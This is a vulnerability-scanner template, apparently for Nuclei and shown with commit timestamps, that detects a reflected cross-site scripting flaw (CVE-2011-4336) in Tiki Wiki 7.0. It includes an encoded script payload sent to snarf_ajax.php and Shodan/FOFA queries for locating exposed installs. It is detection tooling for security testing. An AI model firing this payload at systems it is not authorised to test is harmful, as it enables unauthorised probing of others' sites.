2021-07-28 00:13:33 +00:00
id : CVE-2011-4336
info :
2022-02-21 18:33:16 +00:00
name : Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting
2021-07-28 00:13:33 +00:00
author : pikpikcu
severity : medium
2022-02-21 18:33:16 +00:00
description : Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 13:22:34 +00:00
remediation : Upgrade to the latest version to mitigate this vulnerability.
2021-08-19 13:59:12 +00:00
reference :
2021-07-28 00:13:33 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2011-4336
- https://seclists.org/bugtraq/2011/Nov/140
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2011-4336
cwe-id : CWE-79
2023-11-05 22:23:39 +00:00
epss-score : 0.00255
2024-04-08 11:34:33 +00:00
epss-percentile : 0.64746
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : tiki
product : tikiwiki_cms\/groupware
2024-05-31 19:23:20 +00:00
shodan-query : http.html:"tiki wiki"
fofa-query : body="tiki wiki"
2024-01-14 09:21:50 +00:00
tags : cve,cve2011,seclists,xss,tikiwiki,tiki
2021-07-28 00:13:33 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-28 00:13:33 +00:00
- method : GET
path :
2021-08-02 16:17:19 +00:00
- "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-28 00:13:33 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-07-28 00:13:33 +00:00
words :
2021-08-02 16:17:19 +00:00
- '</script><script>alert(document.domain)</script>'
2021-07-28 00:13:33 +00:00
- type : word
part : header
words :
- text/html
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022079399ba674e01bef79750102ba44d9f07a38ab29df5b774cdcc4dabfe91f6863022100b53005cb48bf10ff0deb593fd5e876d47b6d70d7915ee69c296452f1088a5198:922c64590222798bb761d5b6d8e72950